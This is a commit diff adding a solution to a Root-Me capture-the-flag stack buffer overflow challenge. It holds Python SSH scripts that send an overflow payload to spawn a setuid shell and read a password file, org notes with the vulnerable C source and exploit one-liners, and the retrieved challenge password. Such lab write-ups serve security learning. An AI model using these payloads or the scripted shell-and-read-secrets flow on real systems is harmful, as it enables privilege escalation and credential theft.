feat: app system challenges

Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>

app-system/elf-x86-stack-buffer-overflow-basic-1/helper_exploit_password.py

@@ -0,0 +1,50 @@
+#!/usr/bin/env python3
+import time
+
+import paramiko
+
+HOST = "challenge02.root-me.org"
+PORT = 2222
+USER = "app-systeme-ch13"
+PASSWORD = "app-systeme-ch13"
+
+
+def drain(channel: paramiko.Channel, loops: int = 20, delay: float = 0.2) -> str:
+    chunks = []
+    for _ in range(loops):
+        time.sleep(delay)
+        while channel.recv_ready():
+            chunks.append(channel.recv(65535).decode("utf-8", errors="replace"))
+    return "".join(chunks)
+
+
+def run() -> None:
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    client.connect(
+        hostname=HOST, port=PORT, username=USER, password=PASSWORD, timeout=15
+    )
+    try:
+        shell = client.invoke_shell()
+        banner = drain(shell, loops=10)
+        if banner:
+            print(banner, end="")
+
+        exploit = (
+            '(python3 -c "import sys; '
+            "sys.stdout.buffer.write(b'A'*40+b'\\xef\\xbe\\xad\\xde')\"; "
+            "cat) | ./ch13\n"
+        )
+        shell.send(exploit.encode())
+        print(drain(shell, loops=12), end="")
+
+        shell.send(b"id\n")
+        shell.send(b"cat .passwd\n")
+        shell.send(b"exit\n")
+        print(drain(shell, loops=20), end="")
+    finally:
+        client.close()
+
+
+if __name__ == "__main__":
+    run()

app-system/elf-x86-stack-buffer-overflow-basic-1/helper_recon.py

@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+import paramiko
+
+HOST = "challenge02.root-me.org"
+PORT = 2222
+USER = "app-systeme-ch13"
+PASSWORD = "app-systeme-ch13"
+
+
+def run() -> None:
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    client.connect(
+        hostname=HOST, port=PORT, username=USER, password=PASSWORD, timeout=15
+    )
+    try:
+        commands = [
+            "pwd",
+            "ls -la",
+            "file ch13",
+            "checksec --file=ch13 || true",
+            "./ch13 <<<'AAAA'",
+        ]
+        for cmd in commands:
+            stdin, stdout, stderr = client.exec_command(cmd)
+            out = stdout.read().decode("utf-8", errors="replace")
+            err = stderr.read().decode("utf-8", errors="replace")
+            print(f"--- $ {cmd} ---")
+            if out:
+                print(out, end="" if out.endswith("\n") else "\n")
+            if err:
+                print("[stderr]")
+                print(err, end="" if err.endswith("\n") else "\n")
+    finally:
+        client.close()
+
+
+if __name__ == "__main__":
+    run()

app-system/elf-x86-stack-buffer-overflow-basic-1/notes.org

@@ -0,0 +1,97 @@
+* ELF x86 - Stack buffer overflow basic 1
+Aufgabe
+Einstellungen der Umgebung
+PIE 	Position Independent Executable 	 pas_valide.svg?1566650180
+RelRO 	Read Only relocations 	 pas_valide.svg?1566650180
+NX 	Non-Executable Stack 	 pas_valide.svg?1566650180
+Heap exec 	Non-Executable Heap 	 pas_valide.svg?1566650180
+ASLR 	Address Space Layout Randomization 	 pas_valide.svg?1566650180
+SF 	Source Fortification 	 pas_valide.svg?1566650180
+SRC 	Zugriff auf den Source code 	 valide.svg?1566650190
+Quellcode
+#+begin_src C
+    #include <unistd.h>
+    #include <sys/types.h>
+    #include <stdlib.h>
+    #include <stdio.h>
+
+    int main()
+    {
+
+      int var;
+      int check = 0x04030201;
+      char buf[40];
+
+      fgets(buf,45,stdin);
+
+      printf("\n[buf]: %s\n", buf);
+      printf("[check] %p\n", check);
+
+      if ((check != 0x04030201) && (check != 0xdeadbeef))
+        printf ("\nYou are on the right way!\n");
+
+      if (check == 0xdeadbeef)
+       {
+         printf("Hell yeah! You win!\nOpening your shell...\n");
+         setreuid(geteuid(), geteuid());
+         system("/bin/bash");
+         printf("Shell closed! Bye.\n");
+       }
+       return 0;
+    }
+#+end_src
+
+#+begin_quote
+Zugangsdaten für die Übung
+Host	challenge02.root-me.org
+Protokoll	SSH
+Port	2222
+Zugang per SSH 	ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
+Benutzername	app-systeme-ch13
+Passwort	app-systeme-ch13
+#+end_quote
+
+#+begin_src sh
+python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13
+#+end_src
+
+** Findings (live target)
+
+- Remote path: =/challenge/app-systeme/ch13=
+- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
+- Effective mitigations from runtime check:
+  - Partial RELRO
+  - No stack canary
+  - NX enabled
+  - No PIE
+  - ASLR OFF (on target host)
+- Vulnerability: =fgets(buf,45,stdin)= writes up to 44 bytes into =char buf[40]=, overflowing 4 bytes into adjacent =check=.
+- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef= (little-endian bytes =\xef\xbe\xad\xde=).
+
+** Working exploitation flow
+
+- Basic trigger (proves control of =check=):
+
+#+begin_src sh
+python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
+#+end_src
+
+- To keep stdin open for the spawned SUID shell, use a pipeline with =cat=:
+
+#+begin_src sh
+(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
+id
+cat .passwd
+exit
+#+end_src
+
+- Observed privilege in spawned shell:
+  - =uid=1213(app-systeme-ch13-cracked)=
+  - =gid=1113(app-systeme-ch13)=
+- Retrieved validation password:
+  - =1w4ntm0r3pr0np1s=
+
+** Helper scripts
+
+- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
+- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.